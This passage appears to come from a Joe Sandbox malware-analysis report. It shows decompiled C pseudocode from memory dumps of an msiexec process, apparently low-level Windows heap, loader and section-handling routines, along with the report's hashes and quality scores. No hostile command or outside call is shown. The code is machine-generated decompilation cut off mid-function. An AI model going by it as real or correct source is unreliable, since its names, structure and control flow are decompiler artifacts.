                              					_t136 = E04D1CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                              					_t236 = 0;
                              					if(_t136 < 0) {
                              						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                              					}
                              					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                              						_t193 =  *( *[fs:0x30] + 0x18);
                              						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                              						 *(_t237 - 0x68) = _t236;
                              						 *(_t237 - 0x6c) = _t236;
                              						_t235 = _t236;
                              						 *(_t237 - 0x60) = _t236;
                              						E04D22280( *[fs:0x30], 0x4df8550);
                              						_t139 =  *0x4df7b04; // 0x1
                              						__eflags = _t139 - 1;
                              						if(__eflags != 0) {
                              							_t200 = 0xc;
                              							_t201 = _t237 - 0x40;
                              							_t141 = E04D3F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                              							 *(_t237 - 0x44) = _t141;
                              							__eflags = _t141;
                              							if(_t141 < 0) {
                              								L50:
                              								E04D1FFB0(_t193, _t235, 0x4df8550);
                              								L5:
                              								return E04D5D130(_t193, _t235, _t236);
                              							}
                              							_push(_t201);
                              							_t221 = 0x10;
                              							_t202 =  *(_t237 - 0x40);
                              							_t145 = E04D01C45( *(_t237 - 0x40), _t221);
                              							 *(_t237 - 0x44) = _t145;
                              							__eflags = _t145;
                              							if(_t145 < 0) {
                              								goto L50;
                              							}
                              							_t146 =  *0x4df7b9c; // 0x0
                              							_t235 = L04D24620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                              							 *(_t237 - 0x60) = _t235;
                              							__eflags = _t235;
                              							if(_t235 == 0) {
                              								_t149 = 0xc0000017;
                              								 *(_t237 - 0x44) = 0xc0000017;
                              							} else {
                              								_t149 =  *(_t237 - 0x44);
                              							}
                              							__eflags = _t149;
                              							if(__eflags >= 0) {
                              								L8:
                              								 *(_t237 - 0x64) = _t235;
                              								_t150 =  *0x4df7b10; // 0x10
                              								 *(_t237 - 0x4c) = _t150;
                              								_push(_t237 - 0x74);
                              								_push(_t237 - 0x39);
                              								_push(_t237 - 0x58);
                              								_t193 = E04D3A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                              								 *(_t237 - 0x44) = _t193;
                              								__eflags = _t193;
                              								if(_t193 < 0) {
                              									L30:
                              									E04D1FFB0(_t193, _t235, 0x4df8550);
                              									__eflags = _t235 - _t237 - 0x38;
                              									if(_t235 != _t237 - 0x38) {
                              										_t235 =  *(_t237 - 0x48);
                              										L04D277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                              									} else {
                              										_t235 =  *(_t237 - 0x48);
                              									}
                              									__eflags =  *(_t237 - 0x6c);
                              									if( *(_t237 - 0x6c) != 0) {
                              										L04D277F0(_t235, _t236,  *(_t237 - 0x6c));
                              									}
                              									__eflags = _t193;
                              									if(_t193 >= 0) {
                              										goto L4;
                              									} else {
                              										goto L5;
                              									}
                              								}
                              								_t204 =  *0x4df7b04; // 0x1
                              								 *(_t235 + 8) = _t204;
                              								__eflags =  *((char*)(_t237 - 0x39));
                              								if( *((char*)(_t237 - 0x39)) != 0) {
                              									 *(_t235 + 4) = 1;
                              									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                              									_t161 =  *0x4df7b10; // 0x10
                              									 *(_t237 - 0x4c) = _t161;
                              								} else {
                              									 *(_t235 + 4) = _t236;
                              									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                              								}
                              								 *((intOrPtr*)(_t237 - 0x54)) = E04D437C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                              								_t224 = _t236;
                              								 *(_t237 - 0x40) = _t236;
                              								 *(_t237 - 0x50) = _t236;
                              								while(1) {
                              									_t163 =  *(_t235 + 8);
                              									__eflags = _t224 - _t163;
                              									if(_t224 >= _t163) {
                              										break;
                              									}
                              									_t228 =  *0x4df7b9c; // 0x0
                              									_t214 = L04D24620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                              									 *(_t237 - 0x78) = _t214;
                              									__eflags = _t214;
                              									if(_t214 == 0) {
                              										L52:
                              										_t193 = 0xc0000017;
                              										L19:
                              										 *(_t237 - 0x44) = _t193;
                              										L20:
                              										_t206 =  *(_t237 - 0x40);
                              										__eflags = _t206;
                              										if(_t206 == 0) {
                              											L26:
                              											__eflags = _t193;
                              											if(_t193 < 0) {
                              												E04D437F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                              												__eflags =  *((char*)(_t237 - 0x39));
                              												if( *((char*)(_t237 - 0x39)) != 0) {
                              													 *0x4df7b10 =  *0x4df7b10 - 8;
                              												}
                              											} else {
                              												_t169 =  *(_t237 - 0x68);
                              												__eflags = _t169;
                              												if(_t169 != 0) {
                              													 *0x4df7b04 =  *0x4df7b04 - _t169;
                              												}
                              											}
                              											__eflags = _t193;
                              											if(_t193 >= 0) {
                              												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                              											}
                              											goto L30;
                              										}
                              										_t226 = _t206 * 0xc;
                              										__eflags = _t226;
                              										_t194 =  *(_t237 - 0x48);
                              										do {
                              											 *(_t237 - 0x40) = _t206 - 1;
                              											_t226 = _t226 - 0xc;
                              											 *(_t237 - 0x4c) = _t226;
                              											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                              											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                              												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                              												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                              													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                              													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                              													__eflags =  *((char*)(_t237 - 0x39));
                              													if( *((char*)(_t237 - 0x39)) == 0) {
                              														_t171 = _t210;
                              													} else {
                              														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                              														L04D277F0(_t194, _t236, _t210 - 8);
                              														_t171 =  *(_t237 - 0x50);
                              													}
                              													L48:
                              													L04D277F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                              													L46:
                              													_t206 =  *(_t237 - 0x40);
                              													_t226 =  *(_t237 - 0x4c);
                              													goto L24;
                              												}
                              												 *0x4df7b08 =  *0x4df7b08 + 1;
                              												goto L24;
                              											}
                              											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                              											__eflags = _t171;
                              											if(_t171 != 0) {
                              												__eflags =  *((char*)(_t237 - 0x39));
                              												if( *((char*)(_t237 - 0x39)) == 0) {
                              													goto L48;
                              												}
                              												E04D457C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                              												goto L46;
                              											}
                              											L24:
                              											__eflags = _t206;
                              										} while (_t206 != 0);
                              										_t193 =  *(_t237 - 0x44);
                              										goto L26;
                              									}
                              									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                              									 *(_t237 - 0x7c) = _t232;
                              									 *(_t232 - 4) = _t214;
                              									 *(_t237 - 4) = _t236;
                              									E04D4F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                              									_t238 = _t238 + 0xc;
                              									 *(_t237 - 4) = 0xfffffffe;
                              									_t215 =  *(_t237 - 0x48);
                              									__eflags = _t193;
                              									if(_t193 < 0) {
                              										L04D277F0(_t215, _t236,  *(_t237 - 0x78));
                              										goto L20;
                              									}
                              									__eflags =  *((char*)(_t237 - 0x39));
                              									if( *((char*)(_t237 - 0x39)) != 0) {
                              										_t233 = E04D3A44B( *(_t237 - 0x4c));
                              										 *(_t237 - 0x50) = _t233;
                              										__eflags = _t233;
                              										if(_t233 == 0) {
                              											L04D277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                              											goto L52;
                              										}
                              										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                              										L17:
                              										_t234 =  *(_t237 - 0x40);
                              										_t218 = _t234 * 0xc;
                              										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                              										 *(_t218 + _t235 + 0x10) = _t236;
                              										_t224 = _t234 + 1;
                              										 *(_t237 - 0x40) = _t224;
                              										 *(_t237 - 0x50) = _t224;
                              										_t193 =  *(_t237 - 0x44);
                              										continue;
                              									}
                              									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                              									goto L17;
                              								}
                              								 *_t235 = _t236;
                              								_t165 = 0x10 + _t163 * 0xc;
                              								__eflags = _t165;
                              								_push(_t165);
                              								_push(_t235);
                              								_push(0x23);
                              								_push(0xffffffff);
                              								_t193 = E04D496C0();
                              								goto L19;
                              							} else {
                              								goto L50;
                              							}
                              						}
                              						_t235 = _t237 - 0x38;
                              						 *(_t237 - 0x60) = _t235;
                              						goto L8;
                              					}
                              					goto L4;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a229289157cbbd7e4d43be23131cc095205e1e2aaf684726815e05940659ad40
                              • Instruction ID: 2d28ad63b61061244609d9eb9d4376315e9958f0062c7ebfef4d8ede1eb91745
                              • Opcode Fuzzy Hash: a229289157cbbd7e4d43be23131cc095205e1e2aaf684726815e05940659ad40
                              • Instruction Fuzzy Hash: 98B16BB0F00209EFDB24EFA9D994AADBBB5FF44308F104129E806AB355D770B845DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 67%
                              			E04D3513A(intOrPtr __ecx, void* __edx) {
                              				signed int _v8;
                              				signed char _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				char _v28;
                              				signed int _v32;
                              				signed int _v36;
                              				signed int _v40;
                              				intOrPtr _v44;
                              				intOrPtr _v48;
                              				char _v63;
                              				char _v64;
                              				signed int _v72;
                              				signed int _v76;
                              				signed int _v80;
                              				signed int _v84;
                              				signed int _v88;
                              				signed char* _v92;
                              				signed int _v100;
                              				signed int _v104;
                              				char _v105;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t157;
                              				signed int _t159;
                              				signed int _t160;
                              				unsigned int* _t161;
                              				intOrPtr _t165;
                              				signed int _t172;
                              				signed char* _t181;
                              				intOrPtr _t189;
                              				intOrPtr* _t200;
                              				signed int _t202;
                              				signed int _t203;
                              				char _t204;
                              				signed int _t207;
                              				signed int _t208;
                              				void* _t209;
                              				intOrPtr _t210;
                              				signed int _t212;
                              				signed int _t214;
                              				signed int _t221;
                              				signed int _t222;
                              				signed int _t226;
                              				intOrPtr* _t232;
                              				signed int _t233;
                              				signed int _t234;
                              				intOrPtr _t237;
                              				intOrPtr _t238;
                              				intOrPtr _t240;
                              				void* _t245;
                              				signed int _t246;
                              				signed int _t247;
                              				void* _t248;
                              				void* _t251;
                              				void* _t252;
                              				signed int _t253;
                              				signed int _t255;
                              				signed int _t256;
                              
                              				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                              				_v8 =  *0x4dfd360 ^ _t255;
                              				_v32 = _v32 & 0x00000000;
                              				_t251 = __edx;
                              				_t237 = __ecx;
                              				_t212 = 6;
                              				_t245 =  &_v84;
                              				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                              				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                              				_v48 = __ecx;
                              				_v36 = _t207;
                              				_t157 = memset(_t245, 0, _t212 << 2);
                              				_t256 = _t255 + 0xc;
                              				_t246 = _t245 + _t212;
                              				if(_t207 == 2) {
                              					_t247 =  *(_t237 + 0x60);
                              					_t208 =  *(_t237 + 0x64);
                              					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                              					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                              					_v104 = _t159;
                              					_v76 = _t159;
                              					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                              					_v100 = _t160;
                              					_v72 = _t160;
                              					L19:
                              					_v80 = _t208;
                              					_v84 = _t247;
                              					L8:
                              					_t214 = 0;
                              					if( *(_t237 + 0x74) > 0) {
                              						_t82 = _t237 + 0x84; // 0x124
                              						_t161 = _t82;
                              						_v92 = _t161;
                              						while( *_t161 >> 0x1f != 0) {
                              							_t200 = _v92;
                              							if( *_t200 == 0x80000000) {
                              								break;
                              							}
                              							_t214 = _t214 + 1;
                              							_t161 = _t200 + 0x10;
                              							_v92 = _t161;
                              							if(_t214 <  *(_t237 + 0x74)) {
                              								continue;
                              							}
                              							goto L9;
                              						}
                              						_v88 = _t214 << 4;
                              						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                              						_t165 = 0;
                              						asm("adc eax, [ecx+edx+0x7c]");
                              						_v24 = _t165;
                              						_v28 = _v40;
                              						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                              						_t221 = _v40;
                              						_v16 =  *_v92;
                              						_v32 =  &_v28;
                              						if( *(_t237 + 0x4e) >> 0xf == 0) {
                              							goto L9;
                              						}
                              						_t240 = _v48;
                              						if( *_v92 != 0x80000000) {
                              							goto L9;
                              						}
                              						 *((intOrPtr*)(_t221 + 8)) = 0;
                              						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                              						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                              						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                              						_t226 = 0;
                              						_t181 = _t251 + 0x66;
                              						_v88 = 0;
                              						_v92 = _t181;
                              						do {
                              							if( *((char*)(_t181 - 2)) == 0) {
                              								goto L31;
                              							}
                              							_t226 = _v88;
                              							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                              								_t181 = E04D4D0F0(1, _t226 + 0x20, 0);
                              								_t226 = _v40;
                              								 *(_t226 + 8) = _t181;
                              								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                              								L34:
                              								if(_v44 == 0) {
                              									goto L9;
                              								}
                              								_t210 = _v44;
                              								_t127 = _t210 + 0x1c; // 0x1c
                              								_t249 = _t127;
                              								E04D22280(_t181, _t127);
                              								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                              								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                              								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                              									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                              								}
                              								_t189 = L04D24620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                              								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                              								if(_t189 != 0) {
                              									 *((intOrPtr*)(_t189 + 8)) = _v20;
                              									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                              									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                              									 *_t232 = _t232 + 0x10;
                              									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                              									E04D4F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                              									_t256 = _t256 + 0xc;
                              								}
                              								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                              								E04D1FFB0(_t210, _t249, _t249);
                              								_t222 = _v76;
                              								_t172 = _v80;
                              								_t208 = _v84;
                              								_t247 = _v88;
                              								L10:
                              								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                              								_v44 = _t238;
                              								if(_t238 != 0) {
                              									 *0x4dfb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                              									_v44();
                              								}
                              								_pop(_t248);
                              								_pop(_t252);
                              								_pop(_t209);
                              								return E04D4B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                              							}
                              							_t181 = _v92;
                              							L31:
                              							_t226 = _t226 + 1;
                              							_t181 =  &(_t181[0x18]);
                              							_v88 = _t226;
                              							_v92 = _t181;
                              						} while (_t226 < 4);
                              						goto L34;
                              					}
                              					L9:
                              					_t172 = _v104;
                              					_t222 = _v100;
                              					goto L10;
                              				}
                              				_t247 = _t246 | 0xffffffff;
                              				_t208 = _t247;
                              				_v84 = _t247;
                              				_v80 = _t208;
                              				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                              					_t233 = _v72;
                              					_v105 = _v64;
                              					_t202 = _v76;
                              				} else {
                              					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                              					_v105 = 1;
                              					if(_v63 <= _t204) {
                              						_v63 = _t204;
                              					}
                              					_t202 = _v76 |  *(_t251 + 0x40);
                              					_t233 = _v72 |  *(_t251 + 0x44);
                              					_t247 =  *(_t251 + 0x38);
                              					_t208 =  *(_t251 + 0x3c);
                              					_v76 = _t202;
                              					_v72 = _t233;
                              					_v84 = _t247;
                              					_v80 = _t208;
                              				}
                              				_v104 = _t202;
                              				_v100 = _t233;
                              				if( *((char*)(_t251 + 0xc4)) != 0) {
                              					_t237 = _v48;
                              					_v105 = 1;
                              					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                              						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                              						_t237 = _v48;
                              					}
                              					_t203 = _t202 |  *(_t251 + 0xb8);
                              					_t234 = _t233 |  *(_t251 + 0xbc);
                              					_t247 = _t247 &  *(_t251 + 0xb0);
                              					_t208 = _t208 &  *(_t251 + 0xb4);
                              					_v104 = _t203;
                              					_v76 = _t203;
                              					_v100 = _t234;
                              					_v72 = _t234;
                              					_v84 = _t247;
                              					_v80 = _t208;
                              				}
                              				if(_v105 == 0) {
                              					_v36 = _v36 & 0x00000000;
                              					_t208 = 0;
                              					_t247 = 0;
                              					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                              					goto L19;
                              				} else {
                              					_v36 = 1;
                              					goto L8;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 301fdb9d660b9ead7db57fcfb7d478b31ebbe16e9d700f2306d9530c32a531a2
                              • Instruction ID: 8c43f819c14e2c32725f05ff078d6f54c8c6b96ee940b5a8ca4a494203760ac5
                              • Opcode Fuzzy Hash: 301fdb9d660b9ead7db57fcfb7d478b31ebbe16e9d700f2306d9530c32a531a2
                              • Instruction Fuzzy Hash: 9CC121756087809FD354CF28C590A5AFBF1BF88318F148A6EF8998B352E771E845CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 74%
                              			E04D303E2(signed int __ecx, signed int __edx) {
                              				signed int _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				signed int _v24;
                              				signed int _v28;
                              				signed int _v32;
                              				signed int _v36;
                              				intOrPtr _v40;
                              				signed int _v44;
                              				signed int _v48;
                              				char _v52;
                              				char _v56;
                              				char _v64;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t56;
                              				signed int _t58;
                              				char* _t64;
                              				intOrPtr _t65;
                              				signed int _t74;
                              				signed int _t79;
                              				char* _t83;
                              				intOrPtr _t84;
                              				signed int _t93;
                              				signed int _t94;
                              				signed char* _t95;
                              				signed int _t99;
                              				signed int _t100;
                              				signed char* _t101;
                              				signed int _t105;
                              				signed int _t119;
                              				signed int _t120;
                              				void* _t122;
                              				signed int _t123;
                              				signed int _t127;
                              
                              				_v8 =  *0x4dfd360 ^ _t127;
                              				_t119 = __ecx;
                              				_t105 = __edx;
                              				_t118 = 0;
                              				_v20 = __edx;
                              				_t120 =  *(__ecx + 0x20);
                              				if(E04D30548(__ecx, 0) != 0) {
                              					_t56 = 0xc000022d;
                              					L23:
                              					return E04D4B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                              				} else {
                              					_v12 = _v12 | 0xffffffff;
                              					_t58 = _t120 + 0x24;
                              					_t109 =  *(_t120 + 0x18);
                              					_t118 = _t58;
                              					_v16 = _t58;
                              					E04D1B02A( *(_t120 + 0x18), _t118, 0x14a5);
                              					_v52 = 0x18;
                              					_v48 = 0;
                              					0x840 = 0x40;
                              					if( *0x4df7c1c != 0) {
                              					}
                              					_v40 = 0x840;
                              					_v44 = _t105;
                              					_v36 = 0;
                              					_v32 = 0;
                              					if(E04D27D50() != 0) {
                              						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              					} else {
                              						_t64 = 0x7ffe0384;
                              					}
                              					if( *_t64 != 0) {
                              						_t65 =  *[fs:0x30];
                              						__eflags =  *(_t65 + 0x240) & 0x00000004;
                              						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                              							_t100 = E04D27D50();
                              							__eflags = _t100;
                              							if(_t100 == 0) {
                              								_t101 = 0x7ffe0385;
                              							} else {
                              								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              							}
                              							__eflags =  *_t101 & 0x00000020;
                              							if(( *_t101 & 0x00000020) != 0) {
                              								_t118 = _t118 | 0xffffffff;
                              								_t109 = 0x1485;
                              								E04D87016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                              							}
                              						}
                              					}
                              					_t105 = 0;
                              					while(1) {
                              						_push(0x60);
                              						_push(5);
                              						_push( &_v64);
                              						_push( &_v52);
                              						_push(0x100021);
                              						_push( &_v12);
                              						_t122 = E04D49830();
                              						if(_t122 >= 0) {
                              							break;
                              						}
                              						__eflags = _t122 - 0xc0000034;
                              						if(_t122 == 0xc0000034) {
                              							L38:
                              							_t120 = 0xc0000135;
                              							break;
                              						}
                              						__eflags = _t122 - 0xc000003a;
                              						if(_t122 == 0xc000003a) {
                              							goto L38;
                              						}
                              						__eflags = _t122 - 0xc0000022;
                              						if(_t122 != 0xc0000022) {
                              							break;
                              						}
                              						__eflags = _t105;
                              						if(__eflags != 0) {
                              							break;
                              						}
                              						_t109 = _t119;
                              						_t99 = E04D869A6(_t119, __eflags);
                              						__eflags = _t99;
                              						if(_t99 == 0) {
                              							break;
                              						}
                              						_t105 = _t105 + 1;
                              					}
                              					if( !_t120 >= 0) {
                              						L22:
                              						_t56 = _t120;
                              						goto L23;
                              					}
                              					if( *0x4df7c04 != 0) {
                              						_t118 = _v12;
                              						_t120 = E04D8A7AC(_t119, _t118, _t109);
                              						__eflags = _t120;
                              						if(_t120 >= 0) {
                              							goto L10;
                              						}
                              						__eflags =  *0x4df7bd8;
                              						if( *0x4df7bd8 != 0) {
                              							L20:
                              							if(_v12 != 0xffffffff) {
                              								_push(_v12);
                              								E04D495D0();
                              							}
                              							goto L22;
                              						}
                              					}
                              					L10:
                              					_push(_v12);
                              					_t105 = _t119 + 0xc;
                              					_push(0x1000000);
                              					_push(0x10);
                              					_push(0);
                              					_push(0);
                              					_push(0xf);
                              					_push(_t105);
                              					_t120 = E04D499A0();
                              					if(_t120 < 0) {
                              						__eflags = _t120 - 0xc000047e;
                              						if(_t120 == 0xc000047e) {
                              							L51:
                              							_t74 = E04D83540(_t120);
                              							_t119 = _v16;
                              							_t120 = _t74;
                              							L52:
                              							_t118 = 0x1485;
                              							E04D0B1E1(_t120, 0x1485, 0, _t119);
                              							goto L20;
                              						}
                              						__eflags = _t120 - 0xc000047f;
                              						if(_t120 == 0xc000047f) {
                              							goto L51;
                              						}
                              						__eflags = _t120 - 0xc0000462;
                              						if(_t120 == 0xc0000462) {
                              							goto L51;
                              						}
                              						_t119 = _v16;
                              						__eflags = _t120 - 0xc0000017;
                              						if(_t120 != 0xc0000017) {
                              							__eflags = _t120 - 0xc000009a;
                              							if(_t120 != 0xc000009a) {
                              								__eflags = _t120 - 0xc000012d;
                              								if(_t120 != 0xc000012d) {
                              									_v28 = _t119;
                              									_push( &_v56);
                              									_push(1);
                              									_v24 = _t120;
                              									_push( &_v28);
                              									_push(1);
                              									_push(2);
                              									_push(0xc000007b);
                              									_t79 = E04D4AAF0();
                              									__eflags = _t79;
                              									if(_t79 >= 0) {
                              										__eflags =  *0x4df8474 - 3;
                              										if( *0x4df8474 != 3) {
                              											 *0x4df79dc =  *0x4df79dc + 1;
                              										}
                              									}
                              								}
                              							}
                              						}
                              						goto L52;
                              					}
                              					if(E04D27D50() != 0) {
                              						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              					} else {
                              						_t83 = 0x7ffe0384;
                              					}
                              					if( *_t83 != 0) {
                              						_t84 =  *[fs:0x30];
                              						__eflags =  *(_t84 + 0x240) & 0x00000004;
                              						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                              							_t94 = E04D27D50();
                              							__eflags = _t94;
                              							if(_t94 == 0) {
                              								_t95 = 0x7ffe0385;
                              							} else {
                              								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              							}
                              							__eflags =  *_t95 & 0x00000020;
                              							if(( *_t95 & 0x00000020) != 0) {
                              								E04D87016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                              							}
                              						}
                              					}
                              					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                              						if( *0x4df8708 != 0) {
                              							_t118 =  *0x7ffe0330;
                              							_t123 =  *0x4df7b00; // 0x0
                              							asm("ror esi, cl");
                              							 *0x4dfb1e0(_v12, _v20, 0x20);
                              							_t93 =  *(_t123 ^  *0x7ffe0330)();
                              							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                              							asm("sbb esi, esi");
                              							_t120 =  ~_t50 & _t93;
                              						} else {
                              							_t120 = 0;
                              						}
                              					}
                              					if( !_t120 >= 0) {
                              						L19:
                              						_push( *_t105);
                              						E04D495D0();
                              						 *_t105 =  *_t105 & 0x00000000;
                              						goto L20;
                              					}
                              					_t120 = E04D17F65(_t119);
                              					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                              						__eflags = _t120;
                              						if(_t120 < 0) {
                              							goto L19;
                              						}
                              						 *(_t119 + 0x64) = _v12;
                              						goto L22;
                              					}
                              					goto L19;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: be9508a60b006d02a195e27db39dd8a50d2fe9bfbaa745ec6ab6eaeb0345802e
                              • Instruction ID: 08095ed9203327abebeb0a519784db1ffc1920e01ba497a0a1d92548c333eadb
                              • Opcode Fuzzy Hash: be9508a60b006d02a195e27db39dd8a50d2fe9bfbaa745ec6ab6eaeb0345802e
                              • Instruction Fuzzy Hash: 33911631F00254AFEB339B68C848BAE7BA5FB01729F054266E950AB2D5F774BD40C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 67%
                              			E04D0C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                              				signed int _v8;
                              				char _v1036;
                              				signed int _v1040;
                              				char _v1048;
                              				signed int _v1052;
                              				signed char _v1056;
                              				void* _v1058;
                              				char _v1060;
                              				signed int _v1064;
                              				void* _v1068;
                              				intOrPtr _v1072;
                              				void* _v1084;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				intOrPtr _t70;
                              				intOrPtr _t72;
                              				signed int _t74;
                              				intOrPtr _t77;
                              				signed int _t78;
                              				signed int _t81;
                              				void* _t101;
                              				signed int _t102;
                              				signed int _t107;
                              				signed int _t109;
                              				signed int _t110;
                              				signed char _t111;
                              				signed int _t112;
                              				signed int _t113;
                              				signed int _t114;
                              				intOrPtr _t116;
                              				void* _t117;
                              				char _t118;
                              				void* _t120;
                              				char _t121;
                              				signed int _t122;
                              				signed int _t123;
                              				signed int _t125;
                              
                              				_t125 = (_t123 & 0xfffffff8) - 0x424;
                              				_v8 =  *0x4dfd360 ^ _t125;
                              				_t116 = _a4;
                              				_v1056 = _a16;
                              				_v1040 = _a24;
                              				if(E04D16D30( &_v1048, _a8) < 0) {
                              					L4:
                              					_pop(_t117);
                              					_pop(_t120);
                              					_pop(_t101);
                              					return E04D4B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                              				}
                              				_t70 = _a20;
                              				if(_t70 >= 0x3f4) {
                              					_t121 = _t70 + 0xc;
                              					L19:
                              					_t107 =  *( *[fs:0x30] + 0x18);
